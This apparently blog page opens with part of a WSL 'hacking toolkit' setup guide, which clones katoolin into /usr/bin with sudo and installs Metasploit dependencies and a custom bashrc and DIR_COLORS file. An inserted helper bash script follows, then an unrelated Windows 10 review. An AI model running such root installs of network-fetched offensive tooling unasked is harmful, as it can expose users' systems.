# katoolin: helper for adding the Kali repositories and installing from them
sudo git clone https://github.com/LionSec/katoolin.git
sudo cp katoolin/katoolin.py /usr/bin/katoolin
sudo chmod ugo+x /usr/bin/katoolin

# OpenVPN client support for a private VPN
sudo apt-get -y install network-manager-openvpn network-manager

# Build dependencies for Metasploit
sudo apt-get -y install build-essential libssl-dev libreadline-dev libpq5 libpq-dev libreadline5 libpcap-dev openjdk-7-jre git-core autoconf postgresql libsqlite3-dev pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev

Katoolin is included in the above installation script. To start katoolin, type “sudo katoolin”. Katoolin lets you install packages from the official Kali Linux repository. As with nmap, not all packages will work in WSL. In Katoolin, select 1 and press enter to update the repository. Then select option 2 (view categories) to pick a category and install utilities from the selected category.

Other Linux utilities you may want to install

Here are a few more Linux applications you may wish to install.

Install all the C/C++ build utilities.

sudo apt install build-essential

Install curses for advanced console screen interaction (needed for some text-based games).

sudo apt install libncurses-dev

Grab all the python utilities including pip.

sudo apt install python-pip python-dev
sudo pip install --upgrade pip

Install an improved process monitor – htop.

sudo apt-get install htop

Change the bash color scheme

You can get rid of the mediocre Windows 10 bash color scheme by replacing the bashrc file.  Rename the old file.

cd /etc

sudo mv bash.bashrc bash.bashrc_bkp

Then create a new bashrc file in the /etc directory.

sudo vi bash.bashrc

And paste this code into it.

# /etc/bash.bashrc
#
# https://wiki.archlinux.org/index.php/Color_Bash_Prompt
#
# This file is sourced by all *interactive* bash shells on startup,
# including some apparently interactive shells such as scp and rcp
# that can't tolerate any output. So make sure this doesn't display
# anything or bad things will happen !

# Test for an interactive shell. There is no need to set anything
# past this point for scp and rcp, and it's important to refrain from
# outputting anything in those cases.

# If not running interactively, don't do anything!
[[ $- != *i* ]] && return

# Bash won't get SIGWINCH if another process is in the foreground.
# Enable checkwinsize so that bash will check the terminal size when
# it regains control.
# http://cnswww.cns.cwru.edu/~chet/bash/FAQ (E11)
shopt -s checkwinsize

# Enable history appending instead of overwriting.
shopt -s histappend

case ${TERM} in
    xterm*|rxvt*|Eterm|aterm|kterm|gnome*)
        PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'printf "\033]0;%s@%s:%s\007" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
        ;;
    screen)
        PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'printf "\033_%s@%s:%s\033\\" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
        ;;
esac

# fortune is a simple program that displays a pseudorandom message
# from a database of quotations at logon and/or logout.
# If you wish to use it, please install "fortune-mod" from the
# official repositories, then uncomment the following line:

# [[ "$PS1" ]] && /usr/bin/fortune

# Set colorful PS1 only on colorful terminals.
# dircolors --print-database uses its own built-in database
# instead of using /etc/DIR_COLORS. Try to use the external file
# first to take advantage of user additions. Use internal bash
# globbing instead of external grep binary.

# sanitize TERM:
safe_term=${TERM//[^[:alnum:]]/?}
match_lhs=""

[[ -f ~/.dir_colors ]] && match_lhs="${match_lhs}$(<~/.dir_colors)"
[[ -f /etc/DIR_COLORS ]] && match_lhs="${match_lhs}$(</etc/DIR_COLORS)"
[[ -z ${match_lhs} ]] \
    && type -P dircolors >/dev/null \
    && match_lhs=$(dircolors --print-database)

if [[ $'\n'${match_lhs} == *$'\n'"TERM "${safe_term}* ]] ; then

    # we have colors :-)

    # Enable colors for ls, etc. Prefer ~/.dir_colors
    if type -P dircolors >/dev/null ; then
        if [[ -f ~/.dir_colors ]] ; then
            eval $(dircolors -b ~/.dir_colors)
        elif [[ -f /etc/DIR_COLORS ]] ; then
            eval $(dircolors -b /etc/DIR_COLORS)
        fi
    fi

    PS1="$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]\h'; else echo '\[\033[01;32m\]\u@\h'; fi)\[\033[01;34m\] \w \$([[ \$? != 0 ]] && echo \"\[\033[01;31m\]:(\[\033[01;34m\] \")\\$\[\033[00m\] "

    # Use this other PS1 string if you want \W for root and \w for all other users:
    # PS1="$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]\h\[\033[01;34m\] \W'; else echo '\[\033[01;32m\]\u@\h\[\033[01;34m\] \w'; fi) \$([[ \$? != 0 ]] && echo \"\[\033[01;31m\]:(\[\033[01;34m\] \")\\$\[\033[00m\] "

    alias ls="ls --color=auto"
    alias dir="dir --color=auto"
    alias grep="grep --color=auto"
    alias dmesg='dmesg --color'

    # Uncomment the "Color" line in /etc/pacman.conf instead of uncommenting the following line...!

    # alias pacman="pacman --color=auto"

else

    # show root@ when we do not have colors

    PS1="\u@\h \w \$([[ \$? != 0 ]] && echo \":( \")\$ "

    # Use this other PS1 string if you want \W for root and \w for all other users:
    # PS1="\u@\h $(if [[ ${EUID} == 0 ]]; then echo '\W'; else echo '\w'; fi) \$([[ \$? != 0 ]] && echo \":( \")\$ "

fi

PS2="> "
PS3="> "
PS4="+ "

# Try to keep environment pollution down, EPA loves us.
unset safe_term match_lhs

# Try to enable the auto-completion (type: "pacman -S bash-completion" to install it).
[ -r /usr/share/bash-completion/bash_completion ] && . /usr/share/bash-completion/bash_completion

# Try to enable the "Command not found" hook ("pacman -S pkgfile" to install it).
# See also: https://wiki.archlinux.org/index.php/Bash#The_.22command_not_found.22_hook
[ -r /usr/share/doc/pkgfile/command-not-found.bash ] && . /usr/share/doc/pkgfile/command-not-found.bash

Exit the vi editor and write the file using:

:wq

Then in the /etc directory, create a file /etc/DIR_COLORS and paste in these contents:

# Configuration file for the color ls utility
# This file goes in the /etc directory, and must be world readable.
# You can copy this file to .dir_colors in your $HOME directory to override
# the system defaults.

# COLOR needs one of these arguments: 'tty' colorizes output to ttys, but not
# pipes. 'all' adds color characters to all output. 'none' shuts colorization
# off.
COLOR all

# Extra command line options for ls go here.
# Basically these ones are:
# -F = show '/' for dirs, '*' for executables, etc.
# -T 0 = don't trust tab spacing when formatting ls output.
OPTIONS -F -T 0

# Below, there should be one TERM entry for each termtype that is colorizable
TERM linux
TERM console
TERM con132x25
TERM con132x30
TERM con132x43
TERM con132x60
TERM con80x25
TERM con80x28
TERM con80x30
TERM con80x43
TERM con80x50
TERM con80x60
TERM xterm
TERM xterm-color
TERM vt100
TERM rxvt
TERM rxvt-256color
TERM rxvt-cygwin
TERM rxvt-cygwin-native
TERM rxvt-unicode
TERM rxvt-unicode-256color
TERM rxvt-unicode256
TERM screen

# EIGHTBIT, followed by '1' for on, '0' for off. (8-bit output)
EIGHTBIT 1

# Below are the color init strings for the basic file types. A color init
# string consists of one or more of the following numeric codes:
# Attribute codes: 
# 00=none 01=bold 04=underscore 05=blink 07=reverse 08=concealed
# Text color codes:
# 30=black 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 37=white
# Background color codes:
# 40=black 41=red 42=green 43=yellow 44=blue 45=magenta 46=cyan 47=white
NORMAL 00 # global default, although everything should be something.
FILE 00 # normal file
DIR 01;34 # directory
LINK 01;36 # symbolic link
FIFO 40;33 # pipe
SOCK 01;35 # socket
BLK 40;33;01 # block device driver
CHR 40;33;01 # character device driver

# This is for files with execute permission:
EXEC 01;32

# List any file extensions like '.gz' or '.tar' that you would like ls
# to colorize below. Put the extension, a space, and the color init string.
# (and any comments you want to add after a '#')
.cmd 01;32 # executables (bright green)
.exe 01;32
.com 01;32
.btm 01;32
.bat 01;32
.tar 01;31 # archives or compressed (bright red)
.tgz 01;31
.arj 01;31
.taz 01;31
.lzh 01;31
.zip 01;31
.z 01;31
.Z 01;31
.gz 01;31
.jpg 01;35 # image formats
.gif 01;35
.bmp 01;35
.xbm 01;35
.xpm 01;35
.tif 01;35
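The bashrc above first checks whether the DIR_COLORS database lists a "TERM <name>" entry for the current terminal and then eval's whatever dircolors -b prints from that file. As an added example, not code from the original post, this bash script re-implements both steps over a constructed DIR_COLORS sample: it turns the keyword and extension entries into an LS_COLORS string that can be assigned without eval, and performs the same sanitized TERM match. Function names and the sample content are my own.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): a small re-implementation of what
# "dircolors -b FILE" produces from a DIR_COLORS file, plus the bashrc's TERM check.

# DIR_COLORS content, constructed for this example (same syntax as /etc/DIR_COLORS).
SAMPLE_DIR_COLORS='# Configuration file for the color ls utility
COLOR all
OPTIONS -F -T 0
TERM linux
TERM xterm-256color
EIGHTBIT 1
NORMAL 00 # global default
DIR 01;34 # directory
LINK 01;36 # symbolic link
EXEC 01;32
.tar 01;31 # archives
'

# Map a DIR_COLORS keyword to the two-letter key ls expects in LS_COLORS.
ls_colors_key() {
    case "$1" in
        NORMAL) echo no ;; FILE) echo fi ;; DIR)  echo di ;;
        LINK)   echo ln ;; FIFO) echo pi ;; SOCK) echo so ;;
        BLK)    echo bd ;; CHR)  echo cd ;; EXEC) echo ex ;;
        .*)     echo "*$1" ;;      # ".tar 01;31" becomes "*.tar=01;31"
        *)      return 1 ;;        # COLOR, OPTIONS, TERM, EIGHTBIT carry no colors
    esac
}

# Read DIR_COLORS text on stdin and print the LS_COLORS value, so the result can
# be assigned directly instead of eval'ing generated shell code.
dir_colors_to_ls_colors() {
    local key code rest k out=""
    while read -r key code rest; do
        case "$key" in ''|'#'*) continue ;; esac      # blank lines and comments
        [[ -z $code || $code == '#'* ]] && continue   # keyword without a value
        k=$(ls_colors_key "$key") || continue
        out+="${k}=${code}:"
    done
    printf '%s\n' "$out"
}

# The same test the bashrc makes: does the database list "TERM <name>" for this
# terminal? TERM is reduced to alphanumerics first so it cannot inject glob syntax.
term_is_colorizable() {
    local term=$1 db=$2
    local safe_term=${term//[^[:alnum:]]/?}
    [[ $'\n'${db} == *$'\n'"TERM "${safe_term}* ]]
}
```

Piping a real /etc/DIR_COLORS into dir_colors_to_ls_colors gives the same colon-separated value dircolors -b would wrap in LS_COLORS='...'.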

Resetting Windows Subsystem for Linux (WSL) via the lxrun command

If you jack up WSL, it’s easy to recover by simply removing and reinstalling. To uninstall, open a command window (Windows Command window, not bash) and use:

Lxrun /uninstall

This option will leave your home directory untouched.  Then use this command to reinstall the system:

Lxrun /install

Your home directory will be left untouched, which means you can run your toolkit installation script above to reinstall your hacking toolkit.

Sources: Microsoft

Windows 10 – rough around the edges but the future looks bright!


Windows 10 logo

Gotta give props to Microsoft – they did well with Windows 10 both in terms of the design and implementation of the OS and especially the unique rollout via Windows Update. It’s obvious that Win10 is going to be a spectacular OS in the future. Why are my comments so forward looking? Because Windows 10, in its initial iteration, is pretty rough around the edges.

Star of the Show: The Edge Browser

Let’s begin with Edge, Microsoft’s new browser replacement for Internet Explorer. Reading View, Reading lists and the ability to add notes to a webpage and file it away for future reference – brilliant. On the other hand, Edge doesn’t seem to be much more than, say, Google Chrome (my favorite browser at the moment) for anything else. Edge is not faster, nor does it offer any killer features that would draw me away from the tried and true Chrome browser with its multitude of plugins.

And yes, Edge has a few quirks too. For instance, you can resize the window from the bottom and the left and right edges – but not the top? I tested other applications and they still retain the old resize-from-any-side ability – just not Edge. To fill the entire screen from top to bottom (the first thing I always do when I open a new browser window), you must first drag Edge to the top of the screen and then pull the bottom edge downward to snap it to full height. I honestly have no idea why they took away the ability to resize it from the top, but after the Windows 8 debacle, I’m not going to spend too much time trying to deduce Microsoft’s reasoning on this one.

Windows 10 – the Good… and the Bad

Windows 10 overall brings Microsoft’s OS up to par

As for the OS itself, it has some great new features. Multiple monitors are finally handled well and the new virtual desktops feature puts it on par with Linux desktops. The dark interface has just the right amount of transparency to give it a modern, shall I say “striking”, appearance.  Overall, the new Windows 10 experience is a beauty to behold.

Groove Music player and streaming music service

And the Groove Music Player – let’s say I’m seriously considering telling Spotify to suck it.  The only design problems I’ve seen with Groove so far are the inability to play FLAC files, a weird 50,000 file limit on uploads to OneDrive, and a rumored embarrassing 192bps bitrate (although I have to admit, if the rumored low-bitrate is true, through JBL monitors and 12″ subwoofer, Groove Music sounds remarkably good regardless).  The 50,000 file limit seems especially odd given I’m a new Groove paid subscriber *and* I have unlimited storage space on my paid OneDrive account.  Hopefully Microsoft fixes this limit quickly as it will certainly be a showstopper for some music listeners.

As for the Groove app itself, right now it’s a bit bare bones, but that’s not necessarily a bad thing. I’ve found nothing missing that would keep me from using it as my full-time music player. In fact, the simpler, less convoluted interface is almost a relief compared to MusicBee or Spotify. Stability, however, is questionable at this point. On more than one occasion Groove (and the new Photo app) have bombed while files related to the application were in the process of being synced to OneDrive.

Problems with the Edge web browser

However, things like window dragging seem a bit flaky. For instance, I tore a tab off of the Edge browser, dragged it to a second monitor, released and voilà, the new window appeared back on the original monitor. WTF? Then again, after the odd no-resize-from-the-top quirk, maybe the problem is the Edge browser itself.

Windows 10 and its new security schema

Windows 10 introduces several new security features under the hood, but at this point it’s too early to tell how well the heightened security architecture is going to fare in the real world. The new Device Guard (built on MS’s Hyper-V virtualization technology) and its whitelist solution to application safety sounds great in principle and Trusted Boot is a no-brainer, but I have seen some problems with Win10’s new security framework too.

The Windows 10 file lock/permissions problem

There is apparently some sort of file locking/permissions problem that I believe is related to the OS’s new security features. I’ve seen it in MusicBee and Outlook 2013, and my son has seen it in AutoCAD. In each case, files were locked or otherwise unavailable for use by the application. Running the program as Administrator (which defeats Microsoft’s intent for the new security mechanism) is one solution. For some, removing the Home Group permissions for the file (or folder) in question fixes the problem. As for Outlook 2013, check the security on the .pst file. In my case my account was missing from the ACL list. Add it (with full control?) and Outlook will then open correctly. I don’t expect a patch from MS will fix the file lock problem at the OS level and won’t be surprised to see application vendors rolling out lots of patches for their products over the next few weeks.

Other odds and ends

The Start menu is back and looks like a mashup of the old Windows 7 Start menu and the Windows 8 desktop-like start menu. I’m guessing that after spending some more time with it, I’m going to love it. However, I’ve heard that there are some odd limitations to how many items the menu can hold, which has already given some newly upgraded users quite a few headaches.

I’ve seen other quirks in Windows 10 too. Many of my default application settings were lost or, more accurately, reverted to Microsoft’s applications (e.g. graphics files, default browser). The notifications indicator seems to light up at various times, even when there is no notification to view. OneNote integration reminds me of the Windows 8 debacle and looks like Microsoft can’t decide whether you’re an Office 365 customer or a paid Office Online customer and, as a result, loads the freebie OneNote version even though the full-blown (and much more feature-rich) paid version is installed right next to it. And my Lord, what have they done to Windows Explorer? On one of my machines, I can no longer open up the Control Panel. Apparently one of the control panel applets (I suspect it’s nVidia) is crashing the panel, making it impossible (at the moment) for me to change some of the system settings. And occasionally the system seems to freeze for a second or two. I suspect a driver is the issue – just gotta figure out which one…

Update: looks like it’s the ASUS Xonar audio device.

Hello?  Cortana?

Cortana listens to what I say but won’t talk back (I work in a home office so I was sort of looking forward to the companionship). Head over to Optional Features and find the English text-to-speech option – surely there’s a setting there that will fix it. Expand the feature and click Manage and voilà – nothing happens. It’s a dead button. Click, click, click – nothing. Another WTF.

Then I remembered that I had not activated the machine yet. On Windows 10 Pro, it activated itself, but on Windows 10 Enterprise it seems to require an additional step. Head to Accounts -> Your Account and what do I find? “You need to activate Windows before you can personalize your PC.” No link to activate the machine or anything – just a message in red letters scolding me. Head over to Update and Security and click Activation. Sure enough, the status shows “Windows is not activated”. Click the Activate button and after a minute or so, voilà – a red message telling me “Windows can’t activate. Try again later.” The error details say “DNS name does not exist”. Come on Microsoft – you can do better than this.

After a bit of research I find that there is no KMS host, so I need to change the type of key. I grab a new Enterprise product key from MSDN, enter it, and Windows 10 activates. And guess what? Cortana finally starts talking to me (she tells me something about a grasshopper in a bar named Steve). She seems to have no problems retrieving and telling me the latest weather forecast, looking up movies and events, and just about everything else I’ve thrown at her. “Hey Cortana! I like you!” (to which she audibly responds, “Awesome! Achievement unlocked!” but does not shoot dollar bills out of the DVD slot.)

Cloud everywhere – it’s coming…

It’s easy to see where Microsoft is going with this.  Windows 10 aims to be the backbone of everything you own in the cloud – email, calendar, documents, photos, video, and music.  The apps are there and the integration is already pretty tight.  In time, Windows 10 is going to be the place to go for all of your stuff – and that might just carry over to the mobile platform giving MS the toehold in the Mobile OS arena that they’ve been clamoring for.

Upgrade to Windows 10 – yes or no?

So in short, yes, Windows 10 is OK. Great? Not yet. But the future looks bright. Do I suggest you upgrade now? Yes, I think it is worth the upgrade. It’s free, gets rid of the Windows 8.1 annoyances, and doesn’t seem to present any show-stopper bugs. Plus, I figure Microsoft is going to be rolling out updates pretty regularly now, including feature updates. If they do roll out timely upgrades, I’ll call Windows 10 a home run.